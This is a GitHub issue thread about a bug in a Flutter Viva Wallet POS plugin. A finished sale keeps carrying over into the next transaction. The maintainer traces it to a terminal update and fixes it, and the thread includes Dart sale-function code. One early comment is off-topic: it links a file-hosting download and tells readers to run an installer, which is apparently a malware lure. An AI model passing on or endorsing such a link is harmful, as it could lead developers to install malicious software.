### ISSUE TITLE
viva wallet pos plugin error

### ISSUE THREAD

**Issue by Sajeercherukottayil** [drigler/viva_wallet_pos#4] opened 2024-09-04 13:43 UTC
when the First Sale transaction is proceeding ,after the card reading the transaction is automatically  closed but its added to the transactions list. and the next another transaction processing time its automatically reflect the first transaction .

attached a video preview of using the plugin  in  a simple project.

https://github.com/user-attachments/assets/9086ba2e-1a75-4f27-8259-4bc033b9417c

**Comment by GenaroSalomone** [comment] 2024-09-04 13:43
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by drigler** [comment] 2024-09-04 14:22
Can you share the code of your sale function, eg:

void _sale() async {
    try {
      TransactionResponse response = await _pos.sale(
        clientTransactionId: 'Invoice 1234',
        amount: 10.00,
        showRating: false,
        showReceipt: false,
        showTransactionResult: false,
      );
      _resultMessage(response.message);
    } catch (e) {
      _resultMessage(e.toString(), error: true);
    }
  }

I have a bunch of production devices and it's working as expected.

Denis

**Comment by Sajeercherukottayil** [comment] 2024-09-05 04:51
void _sale() async {
  try {
    TransactionResponse response = await _pos.sale(
      clientTransactionId: widget.salesData.invoiceNo,
      amount: widget.payment.amount,
      showRating: false,
      showReceipt: false,
      showTransactionResult: false,
    );
    print("respons-----$response");
    if (response.status == TransactionStatus.success) {
      VivaWalletRes viva = VivaWalletRes(
        clientTransactionId: response.transactionId ?? '',
        verificationMethod: response.verificationMethod ?? '',
        rrn: response.rrn ?? '',
        cardType: response.cartType ?? '',
        referenceNumber: response.referenceNumber ?? '',
        accountNumber: response.accountNumber ?? '',
        authorisationCode: response.authorisationCode ?? '',
        tid: response.tid ?? '',
        aid: response.aid ?? '',
        orderCode: response.orderCode ?? '',
        shortOrderCode: response.shortOrderCode ?? '',
        transactionDate: response.transactionDate,
        transactionId: response.transactionId ?? '',
      );
      if (mounted) Navigator.pop(context,viva);
    } else {
      Common.toast(response.message);
      if (mounted) Navigator.pop(context);
    }
  } catch (e) {
    print(e);
  }
}

**Comment by drigler** [comment] 2024-09-05 06:59
I was able to reproduce your issue. The problem is with the latest version of viva terminal. I need some time to see what we could do.

**Comment by imGok** [comment] 2024-09-11 11:56
hi, I don't know if it's related but I have this in my callback url even tho the transaction is succesful.
`?status=fail&message=Empty%20response%20received%20from%20Viva%20Wallet%20POS`

**Comment by drigler** [comment] 2024-09-16 12:27
Hi, 
i just released an update for new Terminals. They changed the way terminal works , the new versions don't like to be called with startActivityForResult... i made some (ugly) changes to make it work.

Anyway, now works. Please test and let me know.

Also I noticed that new version of Terminal is a little bit slugish when ending a transaction. Maby is only on developer editions, i still need to test it on production.

Denis

**Comment by imGok** [comment] 2024-09-16 15:26
Thanks for the quick fix @drigler it's working fine on my app now!
About the changes, you couldn't use `registerForActivityResult` (https://developer.android.com/training/basics/intents/result?hl=fr#launch) to get the result ?

**Comment by drigler** [comment] 2024-09-16 18:17
Yes it's working now, but I'm not really happy how it's working.
As per your proposal, that's basically how it worked before, but Terminal App in that mode started to misbehave. It wont close after successfull transaction so you can't have result.

Anyway, I will try to investigate more when I have time for that.

Denis

**Comment by drigler** [comment] 2024-09-16 20:04
Ok guys, I made some tweaks to make plugin more reliable.  Please provide some feedback so I can close this issue.

Thanks,
Denis

**Comment by imGok** [comment] 2024-09-17 08:01
Hello @drigler thanks, working fine for most cases, however It doesn't redirect to main app when Viva Terminal is set to "Kiosk Mode", is it related to this issue ?

**Comment by drigler** [comment] 2024-09-17 08:37
Hi @imGok , glad to hear it's working.

In other hand, kios mode is not intended to be used with other apps. It means Viva Terminal is standalone and pinned, so it doesn't close itsef after transaction / command and no, it doesn't redirect to your app in any way.

But, how did you manage to start Terminal in Kiosk mode within your app anyway?

From the manual:
![image](https://github.com/user-attachments/assets/81e5ecf9-06a5-402f-9b01-053c60a5c513)

Denis

**Comment by imGok** [comment] 2024-09-17 08:51
There is a part in settings called something like "Settings protected by a pin code" and it's in it.
Alright I thought Kiosk Mode was made to prevent the user from leaving the app. 

Anyway thanks for your help/work👍

**Comment by drigler** [comment] 2024-09-17 09:01
Yes you are right, but not leaving your app, it was made to put Viva Terminal in "Kisok mode" and prevet user to leave terminal app :)

Glad it work's for you. 

Regards,
Denis

**Comment by drigler** [comment] 2024-09-19 07:01
The issue is addressed since version 0.0.6

**Closed as completed** 2024-09-19 07:01 UTC
